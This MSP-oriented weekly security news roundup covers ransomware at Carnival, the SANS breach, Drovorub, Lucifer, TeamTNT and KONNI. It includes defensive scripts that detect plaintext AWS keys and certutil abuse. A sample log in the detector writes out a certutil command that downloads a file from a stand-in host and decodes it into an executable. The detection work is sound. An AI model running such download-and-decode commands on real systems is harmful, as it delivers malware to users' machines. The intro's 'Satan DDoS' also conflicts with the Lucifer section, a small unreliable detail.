News You Might’ve Missed. 17 – 21 Aug

What's new this week in the news for MSPs?

New AI tools coming from AWS; Carnival has customer data stolen in a ransomware attack; Russian malware Drovorub aimed at federal Linux-based defense systems; Satan DDoS now scans and infects Linux systems; TeamTNT’s crypto-mining worm steals AWS credentials from Docker systems, and cybercriminals arming phishing emails with macro codes that launch KONNI to grab data and more.

Let's see what it's all about.

New AI Tools Coming From AWS

Amazon Web Services launched a suite of Contact Center Intelligence (CCI) services that let clients add machine learning to their contact center operations. Its capabilities include text-to-speech, enterprise search, language comprehension, translation, business intelligence, and chatbots.

AWS developer advocate Alejandra Quetzalli explains in a blog post that AWS CCI services are being offered through partners like Vonage Holdings Corp., Genesys Telecommunications Laboratories, Inc., and UiPath, Inc., and integrate with already-existing enterprise contact center systems.

According to Quetzalli, the new Amazon CCI is available in regions where the underlying Amazon services are available at present.

Carnival Has Customer Data Stolen in a Ransomware Attack

Carnival Corp. & plc, one of the world’s largest cruise operators, was hit by a ransomware attack in which customer data was taken. On August 15th, the company submitted a filing with the US Securities and Exchange Commission, revealing that the attack was noted on the day it occurred. They haven’t mentioned which form of ransomware was involved in the attack but shared that only a portion of one of their brand’s systems was accessed and encrypted, and specific data files downloaded.

The stolen data included personal information of employees and guests, “which may result in potential claims from guests, employees, shareholders, or regulatory agencies,” according to the company.

Besides launching an investigation, Carnival has engaged legal representation and informed law enforcement and other incident response professionals.

Pentagon Asks for More Time on the Jedi Contract

The US Department of Defense has been reviewing the award of a contract to Microsoft Corp. It has requested a thirty-day extension before it gives its final decision.

The Joint Enterprise Defense Infrastructure (JEDI) project entails an infrastructure for cloud computing for the Pentagon. This project will create a link between many military systems and put them under an individual, unified architecture. According to the Department of Defense (DOD), artificial intelligence projects under JEDI will move ahead to the next level.

The award of JEDI to Microsoft Corp. ahead of a bid by Amazon Web Services, Inc. that experts say was the favorite, has been a matter of controversy.

Amazon and Microsoft have been at loggerheads since the award. Last May, Drew Herdener, VP for AWS, commented that the award decision was "fatally flawed on all six of the technical evaluation factors." Frank Shaw, Microsoft's corporate VP of communications, responded, claiming Amazon was "trying to bog down JEDI in complaints, litigation and other delays" to overcome its failed bid.

Sans Institute Data Breach

The SANS Institute, a cybersecurity training and certification firm, confirmed in a statement this week that it had suffered a data breach. According to the announcement, the hackers took the records of approximately 28,000 clients. The breach began with a phishing email sent to an employee that carried an infected Office 365 attachment.

In its statement, SANS revealed that it had detected the breach on August 6th. It then "quickly stopped any further release of information" from the compromised account. The email account was forwarding the data to a suspicious external email address.

The company suggested that there was no evidence that it was a targeted attack.

Tim Wade at Vectra AI, Inc., a threat detection and response firm, said in a comment to SiliconANGLE, "The real hallmark of modern security is about resilience to attacks – the capacity to perform timely detection and response before material damage is done even after preventative controls have failed."

Ilia Kolochenko, from ImmuniWeb, also noted, "Attackers will now gradually focus their attention on cybersecurity companies and organizations to get their clients' privileged information or credentials." He also offered praise for the SANS Institute's response to the incident.


Russian Malware Drovorub Aimed at Federal Linux-Based Defense Systems

The National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) in a joint advisory revealed that Russian hackers have aimed malware called Drovorub at federal Linux-based defense systems.

They noted that observations reveal ties to the Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS), military unit 26165, also referred to as Fancy Bear, Strontium, or APT 28.

The malware consists of four modules: an implant coupled with a kernel-module rootkit, a file transfer tool, a port forwarding tool, and a command and control (C2) server. It also uses several methods to avoid detection.

Lucifer DDoS Now Scans and Infects Linux Systems

A hybrid DDoS botnet has been observed with new behavior. Previously it was known for targeting vulnerable Windows devices and turning them into crypto-mining bots. Now it is also scanning and infecting Linux systems.

The Lucifer malware creators have also expanded the capabilities of the Windows version to steal credentials and escalate privileges by using the Mimikatz post-exploitation tool.

In May, Palo Alto Networks Unit 42 researchers first noticed the malware deploying an XMRig miner on infected Windows computers using weaponized exploits. It was targeting high- and critical-severity vulnerabilities or brute-forcing machines with TCP ports 135 (RPC) and 1433 (MSSQL) open.

In a recent report published by researchers from NETSCOUT's ATLAS Security Engineering & Response Team (ASERT), the Linux port, as uploaded on VirusTotal on July 9th, 2020, carries the same welcome message as the Windows variant.

Lucifer's creators ensure they can expand the total number of devices controlled by their botnet by adding support for other platforms. The new capabilities lead experts to believe that there is more to come from this botnet.

TeamTNT’s Crypto-mining Worm Steals AWS Credentials From Docker Systems

A crypto-mining worm is stealing plain-text AWS credentials and config files from compromised Docker and Kubernetes systems. The group behind these activities is known as TeamTNT.

MalwareHunterTeam first noted the activity in May, and researchers from Trend Micro did further analysis and found that it targets misconfigured Docker containers.

According to researchers at Cado Security, this worm is the first ever that combines AWS credential theft functionality with run-of-the-mill crypto-mining modules.

The botnet runs the open-source masscan IP port scanner from already-infected servers to find exposed Docker APIs (and, as later discovered, Kubernetes systems), then installs itself in new containers on any misconfigured server it finds.

Cado Security recommends the following in order to defend against the TeamTNT worm’s attacks:

  • Delete any files storing AWS credentials and config info in plain text.
  • Monitor connections made to mining pools using the Stratum mining protocol.
  • Block access to Docker APIs using firewall whitelist rules.
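The first recommendation above is easier to act on with an audit that finds credential material before a worm does. The following is an added example, not code from Cado Security or the original article: it walks a directory tree and flags files that sit where the AWS CLI keeps credentials or that contain an AWS access key ID or a secret key line. The sample tree it builds is constructed, with fake keys that do not work.

```python
import re
import tempfile
from pathlib import Path

# AWS long-term access key IDs start with "AKIA"; the CLI/SDK credentials file
# stores the secret under this INI key. Both are checked as plaintext content.
ACCESS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
SECRET_KEY_RE = re.compile(r"aws_secret_access_key\s*=\s*\S+", re.IGNORECASE)
# File names under ~/.aws that the worm is reported to collect.
KNOWN_CRED_NAMES = {"credentials", "config"}

def find_plaintext_aws_creds(root):
    """Walk `root` and return sorted (relative_path, reasons) pairs for files that
    look like plaintext AWS credentials, by location (.aws/credentials, .aws/config)
    or by content (AKIA access key ID, aws_secret_access_key line)."""
    findings = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        reasons = []
        if path.parent.name == ".aws" and path.name in KNOWN_CRED_NAMES:
            reasons.append("aws-config-path")
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        if ACCESS_KEY_RE.search(text):
            reasons.append("access-key-id")
        if SECRET_KEY_RE.search(text):
            reasons.append("secret-key")
        if reasons:
            findings.append((path.relative_to(root).as_posix(), ",".join(reasons)))
    return sorted(findings)

def demo():
    """Build a constructed sample tree with fake (non-working) keys and audit it."""
    tmp = Path(tempfile.mkdtemp())
    aws_dir = tmp / "home" / "app" / ".aws"
    aws_dir.mkdir(parents=True)
    (aws_dir / "credentials").write_text(
        "[default]\naws_access_key_id = AKIAEXAMPLE0000000AA\n"
        "aws_secret_access_key = EXAMPLEsecretEXAMPLEsecret\n")
    (aws_dir / "config").write_text("[default]\nregion = us-east-1\n")
    app = tmp / "srv" / "app"
    app.mkdir(parents=True)
    (app / ".env").write_text("DB_HOST=localhost\nAWS_KEY=AKIAEXAMPLE1111111BB\n")
    (app / "README.md").write_text("Nothing sensitive here.\n")
    return find_plaintext_aws_creds(tmp)
```

Run `find_plaintext_aws_creds("/")` on a container image or host to get the list of files worth moving to an instance role or a secrets manager.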

Cybercriminals Arm Phishing Emails With Macro Codes That Launch KONNI to Steal Data and More

The Cybersecurity and Infrastructure Security Agency (CISA) of the US Department of Homeland Security has issued an alert about cybercriminals using phishing emails that install KONNI malware on targeted systems.

KONNI is a remote administration tool that hackers frequently use to take screenshots, steal files, capture keystrokes, and execute malicious code on compromised machines. It is commonly delivered through phishing emails with Microsoft Word documents embedded with a Visual Basic Application (VBA) macro that deploys the malware.

It changes the font color from light grey to black to trick users into enabling content. Additionally, KONNI verifies whether the Windows OS is the 32-bit or 64-bit version and builds and executes a command line to download more files.

Once the VBA macro has built the command line, it uses the certificate database tool CertUtil to download remote files from a given URL. It also uses a built-in CertUtil function to decode base64-encoded files.

CISA provides several recommendations to businesses in order to avoid this kind of attack:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating systems up to date.
  • Disable file and printer sharing services.
  • Restrict users' ability to install and run unwanted software applications.

Officials also suggest that it is best not to add users to the local admins group.
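The CertUtil download-and-decode chain described above leaves a recognizable trail in process-creation logs. The following is an added example, not code from CISA or the original article: it flags certutil invocations that fetch a URL with -urlcache or decode a file with -decode, and notes when an Office application spawned the chain, while leaving routine certificate work alone. The sample events and their "<timestamp> <user> <parent_image> -> <command line>" layout are constructed and assumed.

```python
import re

# Constructed sample process-creation events (not taken from the CISA alert). The
# "<timestamp> <user> <parent_image> -> <command line>" layout is an assumption.
SAMPLE_LOGS = [
    "2020-08-18T09:12:01Z alice WINWORD.EXE -> cmd.exe /c certutil -urlcache -split -f "
    "http://example.invalid/stage.txt C:\\Users\\alice\\AppData\\Local\\Temp\\stage.txt",
    "2020-08-18T09:12:03Z alice cmd.exe -> certutil -decode "
    "C:\\Users\\alice\\AppData\\Local\\Temp\\stage.txt C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe",
    "2020-08-18T09:15:22Z svc_pki services.exe -> certutil -verify C:\\certs\\server.cer",
    "2020-08-18T09:20:00Z bob explorer.exe -> notepad.exe C:\\Users\\bob\\notes.txt",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) (?P<parent>\S+) -> (?P<cmd>.*)$")
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

def classify(line):
    """Return (timestamp, user, tags) when the line shows certutil being used the way
    the KONNI macro does, else None. Tags: 'download' for -urlcache with a URL,
    'decode' for -decode, and 'office-parent' when an Office app spawned the chain."""
    m = LINE_RE.match(line)
    if not m:
        return None
    tokens = [t.lower() for t in m["cmd"].split()]
    if not any(t in ("certutil", "certutil.exe") for t in tokens):
        return None
    tags = []
    if "-urlcache" in tokens and any(t.startswith(("http://", "https://")) for t in tokens):
        tags.append("download")
    if "-decode" in tokens:
        tags.append("decode")
    if not tags:
        return None  # ordinary certutil use such as -verify or -dump is left alone
    if m["parent"].upper() in OFFICE_PARENTS:
        tags.append("office-parent")
    return (m["ts"], m["user"], tags)

def scan(lines):
    """Apply classify() to every event and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]
```

An Office parent plus a download tag is the strongest signal here; the decode step on its own is worth correlating with the preceding download from the same user.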

That's a Wrap for News You Might've Missed

I hope this update has been helpful. MSP360 is your resource for MSP news. Stay home, stay safe and healthy, and remember to check back next week for more highlights.
